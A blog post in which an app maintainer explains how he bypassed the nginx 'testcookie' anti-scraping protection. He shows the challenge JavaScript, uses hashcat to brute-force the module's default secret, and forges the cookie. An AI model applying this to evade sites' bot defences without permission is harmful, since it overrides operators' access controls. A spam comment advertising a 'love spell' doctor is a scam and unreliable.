You are here

Bypassing the "testcookie" anti-webscraping protection

ivan's picture
A few days ago, I noticed that ApkTrack (an Android app I maintain) could no longer query one of the websites it usually obtains data from.
The app works mostly through web scraping and once in a while, the target websites set up new countermeasures to prevent bots from accessing their contents (even innocuous bots such as this app). In this post, we'll see how the protection I encountered this week-end was bypassed.

It all began when I noticed that a website (whose identity will not be disclosed) returned the following script in lieu of the expected data:

<html>
 
<body>
    <script type="text/javascript" src="/aes.min.js"></script>
    <script>
        function toNumbers(d) {
            var e = [];
            d.replace(/(..)/g, function(d) {
                e.push(parseInt(d, 16))
            });
            return e
        }
 
        function toHex() {
            for (var d = [], d = 1 == arguments.length && arguments[0].constructor == Array ? arguments[0] : arguments, e = "", f = 0; f < d.length; f++) e += (16 > d[f] ? "0" : "") + d[f].toString(16);
            return e.toLowerCase()
        }
        var a = toNumbers("5d026cff5942d1ab28e3757e4b2e2f87"),
            b = toNumbers("845dd1e672b840c246aa8cfe9b5d3632"),
            c = toNumbers("e48176221e1325e09b9a959370446f05");
        var now = new Date(),
            time = now.getTime();
        time += 3600 * 1000 * 24;
        now.setTime(time);
        document.cookie = "BKS=" + toHex(slowAES.decrypt(c, 2, a, b)) + "; expires=" + now.toUTCString() + "; path=/";
        location.href = "http://site.com/page/?ckattempt=1";
    </script>
</body>
 
</html>

It's plain to see that this script uses a slow AES implementation to generate a cookie required to browse the target website. I notice that the a, b and c variables of the above script change with every try, and while they kind of look like MD5 hashes, none of them can be reversed easily. Time to dig in.
Ideally, I'd like to read the code which generates these values. I'm in luck: a quick search points me to an nginx module called testcookie.

Reading through the 2000-something lines of code is made difficult by the numerous macros coming from nginx, but I understand the following:

  • a and b are the key and initialization vector (respectively) used for the AES-CBC computation ; c is the data to decipher.
  • The latter is generated the following way: c = AES(MD5($testcookie_session + $testcookie_secret)), those two variables being defined in the nginx configuration. More precisely:
    • According to the documentation, testcookie_session can either be the visitor's IP address (i.e. 127.0.0.1), or their IP concatenated with the browser's user-agent (i.e. 127.0.0.1Mozilla/5.0 (X11; Ubuntu; Linux x86_64; [...]). This part is predictable and can be generated easily.
    • testcookie_secret however is an unknown value. It can be fixed, or random (in which case it changes every time the web server is rebooted).

There are basically two ways to bypass this protection. The first way would be to run the javascript code just like a browser would. The second way is to somehow guess what the cookie's value is expected to be. The former implies a lot of overhead in my tiny Android app, so I start looking into the latter.
I need to find out how the testcookie_session is generated on the target website, since it is configuration-dependant. That part is easy: I take another browser, navigate to the website and compare the cookies: they're identical. This means that only the IP address is used Next, I have to guess testcookie_secret's value. We face the following equation:

  • I know a valid cookie just by visiting the website: 64534e58cbc178830089d06de12c00ed.
  • My IP address at the time was 95.130.11.147.
  • We have established that 64534e58cbc178830089d06de12c00ed = MD5("95.130.11.147" + testcookie_secret).

This is a textbook bruteforce situation. I fireup Hashcat:

PS C:\Users\Ivan\oclHashcat-1.33> .\oclHashcat64.exe -m0 .\targets\site.txt -a7 95.130.11.147 .\dicts\wordlist.txt
oclHashcat v1.33 starting...
[...]
64534e58cbc178830089d06de12c00ed:95.130.11.147keepmesecret

The a7 option corresponds to a hybrid attack, which means that every word from the dictionary is prefixed with an arbitrary string (here, my IP address). After a while, Hashcat proudly announces the result: testcookie_secret = keepmesecret.
I actually guessed that value before the bruteforce had ended for a simple reason: keepmesecret is the example value given in the documentation and I had tested it manually. When in doubt, always assume the sysadmin was lazy.

We now have everything needed to forge our cookies, and computing a MD5 hash before each request is all it takes to bypass the protection.

EDIT : Following this post, testcookie_secret's minimum size has been increased to 32 characters in the latest version of the script.

Comments

The superb work done by dr. wakina that brought back my husband encouraged me to wright this testimony, to motivate anybody out there fighting to sustain his or her relationship that there is still hope and ways to get back your lover because letting go will never heal a wounded heart, but finding the total cure does. I am happy woman today because of the right decisions and steps I took to fight for the man I wants to spend my entire life with and also the father of my child.
I had hope when I came across information and testimonies online by people writing on how their partner returned to them after a love spell from dr. wakina via his email dr.wakinalovetemple@gmail.com.
Before the love spell, I keep wondering how my husband moved from being a loving and caring father to a vile and nasty person overnight without reasons, unlike him. I searched myself to the ground and did not see the wrong I have done that made him pick up a bag of his cloths to his friends basement just five days to our eleventh anniversary without saying a word. I love him with every breath in me and I can do anything to make him love me gain. The testimonies and information I got about dr. wakina became my only hope after several failed attempt to get him back after he was gone for two weeks.

Add new comment

(If you're a human, don't change the following field)
Your first name.
(If you're a human, don't change the following field)
Your first name.
(If you're a human, don't change the following field)
Your first name.

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
To prevent automated spam submissions leave this field empty.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
10 + 6 =
Solve this simple math problem and enter the result. E.g. for 1+3, enter 4.